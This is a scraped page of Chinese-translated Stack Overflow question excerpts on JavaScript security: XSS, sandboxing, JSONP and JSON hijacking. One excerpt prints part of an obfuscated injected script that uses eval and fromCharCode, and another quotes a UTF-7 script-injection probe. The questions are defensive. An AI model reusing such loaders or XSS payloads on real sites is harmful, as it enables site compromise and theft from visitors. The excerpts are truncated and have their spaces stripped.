jjzjj

javascript - 在 javascript 变量中保存密码 - 安全隐患?

在浏览器的javascript变量中保存用户密码是否会暴露任何特定的安全漏洞,除了基于浏览器的客户端的常见安全漏洞之外?将此代码段视为一个简单示例-jsfiddleherePasswordStorepasswordinwindow.passwordfunctiongetContentsOfPasswordField(){returnjQuery("input#password").val();}jQuery("button#pwdButton").on("click",function(){window.password=getContentsOfPasswordField();ale

javascript - DOM 文本节点是否保证不会被解释为 HTML?

有谁知道Text类型的DOMNode是否保证不会被浏览器解释为HTML?更多详细信息如下。背景我正在为一个friend构建一个简单的网络评论系统,我一直在思考XSS攻击。我不认为过滤或转义HTML标签是一个非常优雅的解决方案——想出一个可以绕过过滤器的卷积太容易了。根本问题是,我想保证,对于某些内容(即随机未经身份验证的网络用户发布的内容),浏览器从不尝试解释或运行该内容。一个普通的(文本)开始首先想到的是使用Content-Type:text/plain,但这必须应用于整个页面。您可以将纯文本IFRAME放在页面中间,但这很丑陋,并且如果用户点击进入框架,它会产生焦点问题。inner

javascript - 这个 JavaScript hack 的目的是什么?

这段代码一直在我维护的网站上弹出,关于这里发生的事情有什么线索吗?if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{newlocation(12);}catch(qqq){s=String;f='f'+'r'+'o'+'m'+'C'+'har';f+='Code';}ee='e';e=window.eval;t='y';}h=Math.round(-4*Math.tan(Math.atan(0.5)));n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5

javascript - 在本地主机上运行时不执行 JSONP 回调

这很奇怪,我想知道是否有人可以阐明为什么会发生这种情况。基本上,我一直在努力尝试测试JSONP,以便我可以实现其他网站可以使用的JSONWeb服务。我在本地主机上进行开发——特别是VisualStudio2008和VisualStudio2008的内置Web服务器。因此,作为使用jQuery运行的JSONP测试,我实现了以下内容:$().ready(function(){debugger;try{$.getJSON("XssTest?callback=?",function(data){alert(data.abc);});}catch(err){alert(err);}});在服务器

javascript - 企图利用?

我看到我的nopCommerce网站有一个记录搜索:ADw-scriptAD4-alert(202)ADw-/scriptAD4-我有点好奇他们想要完成什么。我搜索了一下,似乎是ADw-scriptAD4-以UTF7编码为.但是为什么alert(202)?他们只是检查漏洞吗?记录了更多的黑客尝试,我在这里提出了一个关于它们的新问题:Hackingattempt,whatweretheytryingtodoandhowcanIcheckiftheysucceeded? 最佳答案 有人正在检查您是否有UTF-7注入(inject)漏洞,

javascript - 如何在浏览器中安全地运行用户提供的 Javascript 代码?

想象一个场景,我想连续调用用户提供的Javascript代码,如下例所示,其中getUserResult是某个用户(不是我自己)编写的函数:for(vari=0;i如何在浏览器和/或Node.js中执行此类代码,而不存在任何安全风险?更一般地说,如何执行不允许修改甚至读取当前网页或任何其他全局状态的Javascript函数?是否有类似浏览器内“JS虚拟机”的东西?JSFiddle如何确保您不能运行任何恶意代码(至少它可以钓鱼您的登录名,在页面的生命周期内运行机器人,如果不是做更糟糕的事情)?或者它根本不能确保这一点? 最佳答案 经过

javascript - 使用 img 标签加载不受信任的 SVG 时的 XSS

使用img加载不受信任的SVG文件时是否存在XSS威胁?标签?如:我读到大多数浏览器在通过img加载的svg文件中禁用脚本标签。 最佳答案 这曾经在某些浏览器中有效,但现在不行了。但是有一个相关的问题。如果我作为一个不知情的用户,右键单击并下载图像,然后在本地打开它,它很可能会在浏览器中打开并运行脚本。考虑到它是一张图片,这有点奇怪。我想如果您右键单击并选择“查看图像”也可能导致脚本运行,因为您直接打开了它。 关于javascript-使用img标签加载不受信任的SVG时的XSS,我们在

javascript - 跨站 XMLHttpRequest

我想提供一段Javascript代码,它可以在包含它的任何网站上运行,但它总是需要在托管Javascript的服务器上获取更多数据(甚至修改数据)。我知道出于显而易见的原因存在安全限制。考虑托管在xyz.com上的index.html,其中包含以下内容:some.js能否使用XMLHttpRequest将数据发布到abc.com?换句话说,abc.com是否因为我们从那里加载了Javascript而隐式信任? 最佳答案 Willsome.jsbeabletouseXMLHttpRequesttopostdatatoabc.com?I

javascript - Javascript输出JSON内容时,HTML转码应该在服务端转义还是在客户端转义?

我有一个应用程序,它包含一个用PHP编写的服务器端RESTAPI,以及一些使用此API并使用它生成的JSON来呈现页面的客户端Javascript。所以,这是一个非常典型的设置。RESTAPI提供的数据是“不受信任的”,因为它正在从数据库中获取用户提供的内容。因此,例如,它可能会获取如下内容:{"message":"alert("Gotcha!")"}显然,如果我的客户端代码要将其直接呈现到页面的DOM中,那么我已经创建了一个XSS漏洞。因此,此内容需要先进行HTML转义。问题是,输出不可信内容时,应该在服务端转义,还是在客户端转义?即,我的API应该返回原始内容,然后让客户端Java

javascript - 覆盖 Array 构造函数不会影响 [],对吗?

我刚读到:http://haacked.com/archive/2008/11/20/anatomy-of-a-subtle-json-vulnerability.aspx我的印象是,覆盖Object或Array只有在您选择使用时才有效创建arrays/objects时构造函数起作用,但是,根据那篇文章,它也对文字创建({}和[])...我的逻辑:Array=function(){alert('Hi');};[1,2,3,4,5];([1,2,3,4,5]);vara=[1,2,3,4,5];//...//...Nothingisalerted那么,我是疯了还是有一些我不知道的特定于实